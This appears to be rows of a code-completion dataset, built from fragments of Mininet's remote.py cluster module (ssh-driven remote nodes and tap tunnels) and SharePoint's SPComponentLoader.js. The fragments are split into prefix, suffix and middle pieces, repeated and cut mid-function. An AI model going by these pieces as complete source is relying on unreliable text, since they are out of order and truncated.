controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs) | controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node | random_line_split |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
|
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| "Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs) | identifier_body |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches'; | * SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/** | random_line_split |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
